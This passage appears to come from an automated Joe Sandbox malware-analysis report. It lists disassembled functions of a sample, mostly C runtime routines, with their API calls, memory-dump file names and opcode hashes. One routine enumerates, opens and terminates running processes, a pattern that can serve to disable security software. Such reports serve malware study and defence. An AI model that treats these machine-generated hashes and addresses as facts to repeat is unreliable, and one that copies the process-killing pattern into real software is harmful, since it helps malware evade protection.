                                                                                                                                                                                            • Instruction Fuzzy Hash: 3851ED766012159FCB24CF5CC480E9AFBE4FF68310B0485ABE9199B752D732ED04CBA0
                                                                                                                                                                                            Function 005D1ED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005D1F88
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
                                                                                                                                                                                            • Opcode ID: 3a3bf96cb8015d797bf87146d02e12d2eeca20413438d43a9124579f78ca5970
                                                                                                                                                                                            • Instruction ID: 1f0fbc8e582b4647edf136d03128d2e8641f60848235fa0dc1e8c1725d79c518
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a3bf96cb8015d797bf87146d02e12d2eeca20413438d43a9124579f78ca5970
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99417FB06007069FD720CF59C598B5BBFE4BF04304F44896ED94A8B782D7B6E958CB91
                                                                                                                                                                                            Function 005E4D30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005E4D99
                                                                                                                                                                                              • Part of subcall function 005EF760: std::_Lockit::_Lockit.LIBCPMT ref: 005EF772
                                                                                                                                                                                              • Part of subcall function 005EF760: std::locale::_Setgloballocale.LIBCPMT ref: 005EF78D
                                                                                                                                                                                              • Part of subcall function 005EF760: _Yarn.LIBCPMT ref: 005EF7A3
                                                                                                                                                                                              • Part of subcall function 005EF760: std::_Lockit::~_Lockit.LIBCPMT ref: 005EF7E3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 238635018-1866435925
                                                                                                                                                                                            • Opcode ID: f20416c6e9972406d310124c11d303940b7f52e37b25951c8a9d81b7168b159e
                                                                                                                                                                                            • Instruction ID: 5aaa403f5f67b3dfb6bec5a751f904a5254765e772268557c26d6739b2b42168
                                                                                                                                                                                            • Opcode Fuzzy Hash: f20416c6e9972406d310124c11d303940b7f52e37b25951c8a9d81b7168b159e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3631C0B19007459FE724DF25C459B57BBE8BF80304F048929D9868BA82E7BAE804CB81
                                                                                                                                                                                            Function 005DF3A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92processCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 005DF447
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 005DF45A
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 005DF45F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                            • Opcode ID: c89bfbc05a533cefb44b05c714eb175de6b28b992c5a4d01b4cb6e4e6e4d76c1
                                                                                                                                                                                            • Instruction ID: 044741e4da620c9fc33eb5838826336705129741b9c690e0da8ea529b236e91f
                                                                                                                                                                                            • Opcode Fuzzy Hash: c89bfbc05a533cefb44b05c714eb175de6b28b992c5a4d01b4cb6e4e6e4d76c1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A319E32E1021D9BDB20CF98CD45BEEBB76BF99314F24561AE50577284E7B06980CBA0
                                                                                                                                                                                            Function 0060C914 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 0060C9E4
                                                                                                                                                                                            • _free.LIBCMT ref: 0060CA0D
                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0060ACFD,00000000,0060AF94,?,?,?,?,?,?,?,0060ACFD,0060AF94,00000000), ref: 0060CA3F
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0060ACFD,0060AF94,00000000,?,?,?,?,00000000), ref: 0060CA5B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                                                                            • Opcode ID: 9b60cce1e5e38ce49f53287086fc94a5ab30037d61fb019df1c686e35a04b3ba
                                                                                                                                                                                            • Instruction ID: 17303b2194ffeeba7f3e1d4e134954213bcaaec7aded57b5ecd79a4a654e7a47
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b60cce1e5e38ce49f53287086fc94a5ab30037d61fb019df1c686e35a04b3ba
                                                                                                                                                                                            • Instruction Fuzzy Hash: EF41E872A806099BDB19ABB8CD4ABAF3B6AFF84370F140614F514E72E1EA34CD414761
                                                                                                                                                                                            Function 00604496 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005F93E4: _free.LIBCMT ref: 005F93F2
                                                                                                                                                                                              • Part of subcall function 0060408B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00601A10,?,00000000,00000000), ref: 00604137
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 006044FE
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00604505
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00604544
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0060454B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                                                                            • Opcode ID: d81cf207b2ac5ec23d0aa5b9f454a8893a2bd19978c41c2f8159d4260eb3139c
                                                                                                                                                                                            • Instruction ID: 135ebc082075c99dbb8ce3ac0cad1bdab9bf673b1d9ca00bb1ed48c7276dd303
                                                                                                                                                                                            • Opcode Fuzzy Hash: d81cf207b2ac5ec23d0aa5b9f454a8893a2bd19978c41c2f8159d4260eb3139c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7321B2F1640609AFDB35AF658C809BBB7AEFE443647104519FA25972C1EF70EC0087A0
                                                                                                                                                                                            Function 005FCA90 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                            • _free.LIBCMT ref: 005FCAF2
                                                                                                                                                                                            • _free.LIBCMT ref: 005FCB28
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                                                                            • Opcode ID: 0356c869eb3808505d8201e15eca3e9fb6b2957e3536b54cdfeaaa7db46849da
                                                                                                                                                                                            • Instruction ID: 7271bbdafede5cecc3eaccbc290daeacdda986948000be015ffad5bf3e86bece
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0356c869eb3808505d8201e15eca3e9fb6b2957e3536b54cdfeaaa7db46849da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3611297224460E7AD71267759E8BD7B2E2BFBC13B072C0B35F764921D2DD6D8C018121
                                                                                                                                                                                            Function 005FCBE7 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,005F8B2B,006009C0,?,?,005F18D8,?,?,?,?,?,005D11E3,?,?), ref: 005FCBEC
                                                                                                                                                                                            • _free.LIBCMT ref: 005FCC49
                                                                                                                                                                                            • _free.LIBCMT ref: 005FCC7F
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,005F18D8,?,?,?,?,?,005D11E3,?,?), ref: 005FCC8A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                                                                            • Opcode ID: 2444f3fa51ea211d91ed8f7aeef7e0a1ccc3847773dcd0feaac307b3d8df93ad
                                                                                                                                                                                            • Instruction ID: ce45aacd8d2be4dac93facfab59c017ee68eb32242922d9429f81919c8886692
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2444f3fa51ea211d91ed8f7aeef7e0a1ccc3847773dcd0feaac307b3d8df93ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8211007120450D7AD71127769E8AD3B3E5BFBC27B07280A35F33C831D2DD298C015121
                                                                                                                                                                                            Function 005D1330 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • K32EnumProcesses.KERNEL32(?,00001000,?), ref: 005D134D
                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005D1397
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 005D13A2
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 005D13A9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$CloseEnumHandleOpenProcessesTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1176117389-0
                                                                                                                                                                                            • Opcode ID: 9748d41ae2ff0f38a87fb646dc225f11f5261d662fc1ae80c280a2d254a28d87
                                                                                                                                                                                            • Instruction ID: baa0f422620a5c562f1ac2d02bc5a88c5939e8739332f2586ac7fb2024f5ca79
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9748d41ae2ff0f38a87fb646dc225f11f5261d662fc1ae80c280a2d254a28d87
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1701473260021977EB209AE8EC45FDF379DEB08301F000472FF09C2240EAA1DD404369
                                                                                                                                                                                            Function 0060C4ED Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,00000000,?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000), ref: 0060C504
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000,?,00000000,?,005FE779,00000010), ref: 0060C510
                                                                                                                                                                                              • Part of subcall function 0060C4D6: CloseHandle.KERNEL32(FFFFFFFE,0060C520,?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000,?,00000000), ref: 0060C4E6
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 0060C520
                                                                                                                                                                                              • Part of subcall function 0060C498: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0060C4C7,00608E3F,00000000,?,005FE22D,?,00000010,00000000,?), ref: 0060C4AB
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000,?), ref: 0060C535
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: 8138b3e5f7ed4224d6308ead09d9b41faea6ab792ffa4799d9e9b2e29c177312
                                                                                                                                                                                            • Instruction ID: fde54d58e061b05a5f6ee79a86461653a8ce5b13e519a410a06ece309f0a1f69
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8138b3e5f7ed4224d6308ead09d9b41faea6ab792ffa4799d9e9b2e29c177312
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58F0AC37580168BBCF262F95EC04ADB3F67FF093B1B059914FA1E95160C67298309B94
                                                                                                                                                                                            Function 005FBC9F Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 005FBCA8
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 005FBCBB
                                                                                                                                                                                            • _free.LIBCMT ref: 005FBCCC
                                                                                                                                                                                            • _free.LIBCMT ref: 005FBCDD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 59213797d60a23f856efa21cdccb972af46dbec5f72dba2a3026ed9b8142d6dc
                                                                                                                                                                                            • Instruction ID: 7e8b748440be66ce3e61c59c47ad2322122c0cb908c4c69c746a8e3b372c5c94
                                                                                                                                                                                            • Opcode Fuzzy Hash: 59213797d60a23f856efa21cdccb972af46dbec5f72dba2a3026ed9b8142d6dc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 63E04F7140492AABA7222F10BF0A4663E27B7A57903036416F75006232C67511B3DF80
                                                                                                                                                                                            Function 005DEC30 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 005DEF60
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                            • String ID: 0$H
                                                                                                                                                                                            • API String ID: 323602529-1388647558
                                                                                                                                                                                            • Opcode ID: 5296f759b5d686c7febd6911476d7bafc31e6643e819bd38d673c8cd0aefa021
                                                                                                                                                                                            • Instruction ID: 2669bf2706dae0869e5af551dffe1cb4cc63af6cb84002996a63ddc271f496f6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5296f759b5d686c7febd6911476d7bafc31e6643e819bd38d673c8cd0aefa021
                                                                                                                                                                                            • Instruction Fuzzy Hash: FFA14B70A002599FDB24CF58C885BDEBBB5FF49300F1485E9E449AB381DB71AA88CF51
                                                                                                                                                                                            Function 005F910D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 005F919D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                            • Opcode ID: dbe4cb42b185592ee715eed2bf63ac1f3124a75edf241e356e6a0729265563ee
                                                                                                                                                                                            • Instruction ID: e33bb2f186ee6d2a7d7d0a4ce2e3213e7e1a2d4aa2efff8ec0d4065948182768
                                                                                                                                                                                            • Opcode Fuzzy Hash: dbe4cb42b185592ee715eed2bf63ac1f3124a75edf241e356e6a0729265563ee
                                                                                                                                                                                            • Instruction Fuzzy Hash: 36518D61A4890796CB197714CD057FB3FAAFF40702F248D6EE191423E8EB394ED1DA46
                                                                                                                                                                                            Function 005DFA30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DFB90
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 005DFB95
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: e^
                                                                                                                                                                                            • API String ID: 118556049-2283852391
                                                                                                                                                                                            • Opcode ID: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
                                                                                                                                                                                            • Instruction ID: 4d68f9e42f65585c56631ccddd4b415b0d57e0e2d54a27fce4da622bfb3d3f03
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
                                                                                                                                                                                            • Instruction Fuzzy Hash: 67417C356007129FD724CF29D490A2ABBE5FF98710B14893FE8DA8B752D731E991CB90
                                                                                                                                                                                            Function 005F99DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
